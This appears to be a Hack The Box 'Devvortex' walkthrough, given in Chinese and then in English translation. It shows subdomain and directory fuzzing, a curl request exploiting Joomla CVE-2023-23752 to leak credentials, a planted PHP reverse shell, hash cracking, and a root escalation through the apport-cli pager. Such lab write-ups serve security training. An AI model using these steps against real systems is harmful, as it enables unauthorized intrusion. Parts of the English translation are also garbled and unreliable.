htb devvortex

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds

Vulnerability Analysis

由于页面都是静态的所以寻找虚拟机

  Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]

打开dev.devvortex.htb,发现也是静态,寻找一下子目录

  Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home                    [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components              [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator           [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]

http://dev.devvortex.htb/administrator/得到Joomla Administrator Login,查找到一个漏洞CVE-2023-23752

在GitHub中找到Version目录https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml

http://dev.devvortex.htb/administrator/manifests/files/joomla.xml得到4.2.6可以使用[CVE-2023-23752](https://www.exploit-db.com/exploits/51334)

Exploitation (User Flag)

  Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq

得到凭据lewis:P4ntherg0t1n5r3c0n##

我们在System > Site Templates > Cassiopeia Details and Files > error.php添加php反向shell

ss -tlpn->3306,33060得知mysql

www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
				public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'lewis';
        public $password = 'P4ntherg0t1n5r3c0n##';

mysql -u lewis -p登录数据库

枚举数据库得到

| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

破解hash值得到凭据logan:tequieromucho

Privilege Escalation (Root Flag)

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

搜索得到CVE-2023-1326

logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# 输入2
# 输入1或随机
# 输入V
# 输入!/bin/bash
即可得到root

Lessons Learned

htb devvortex

Information Gathering

# Nmap 7.98 scan initiated on Saturday, December 27, 2025, at 09:08:15, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242:
The host is up (latency: 0.12 seconds).
998 closed TCP ports were not displayed (they were reset).

PORT     STATE      SERVICE         VERSION
22/tcp     open        ssh           8.2p1         Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
|         ssh-hostkey:
|           3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|           256  b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|           256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp     open        http           nginx 1.18.0         (Ubuntu)
|         http-methods:
|           Supported methods: GET, HEAD, POST, OPTIONS
|         http-server-header: nginx/1.18.0         (Ubuntu)
|         http-title: Did not follow redirect to http://devvortex.htb/
Device type: General purpose
Operating system: Linux 4.X|5.X
OS Common Platform Enumeration (CPE): cpe:/o:linux:linux_kernel:4, cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 5.19
Uptime estimate: 15.115 days (since Friday, December 12, 2025, 06:22:47)
Network distance: 2 hops
TCP sequence prediction difficulty: 265 (Difficult!)
IP ID sequence generation: All zeros
Service information: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Data files were read from: /usr/share/nmap
OS and service detection completed. Please report any incorrect results at: https://nmap.org/submit/.

# Nmap completed on Saturday, December 27, 2025, at 09:08:31 – 1 IP address (1 host up) scanned in 15.48 seconds.

Vulnerability Analysis

Since all pages are static, we need to find a virtual machine to perform further analysis.

 Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]

We open dev.devvortex.htb and find that it is also static. Next, we use ffuf to list the available directories:

 Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home                    [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components              [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator           [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]

The path http://dev.devvortex.htb/administrator/ leads to the Joomla administrator login page. We have identified a vulnerability CVE-2023-23752 here.

The Version directory can be found on GitHub at the following link:
https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml

The joomla.xml file from http://dev.devvortex.htb/administrator/manifests/files/joomla.xml (version 4.2.6) is affected by the vulnerability CVE-2023-23752.

Exploitation (User Flag):

 Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq

We obtained the credentials: lewis:P4ntherg0t1n5r3c0n##.

We added a PHP reverse shell in System > Site Templates > Cassiopeia Details and Files > error.php.

By using ss -tlpn on port 3306, we identified that the database used is MySQL.

www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
                public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'lewis';
        public $password = 'P4ntherg0t1n5r3c0n##';

We logged into the database using mysql -u lewis -p.

By enumerating the database users, we found the username logan and the corresponding password:

| 650 | logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |

We cracked the password hash to obtain the actual credentials: logan:tequieromucho.

Privilege Escalation (Root Flag):

logan@devvortex:~$ sudo -l

We found the following default settings for the user logan on devvortex:

  • env_reset
  • mail_badpass
  • secure_path is set to multiple directories including /usr/local/sbin, /usr/local/bin, etc.

The user logan can execute the following commands on devvortex with full privileges:

  • /usr/bin/apport-cli

We verified the version of apport-cli using:

logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

We then searched for relevant vulnerabilities using apport-cli:

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

By entering specific commands (e.g., 2, 1, or V), or even !/bin/bash, we were able to obtain root access.

Lessons Learned:

```bash
# (No specific lessons learned mentioned in the original text.)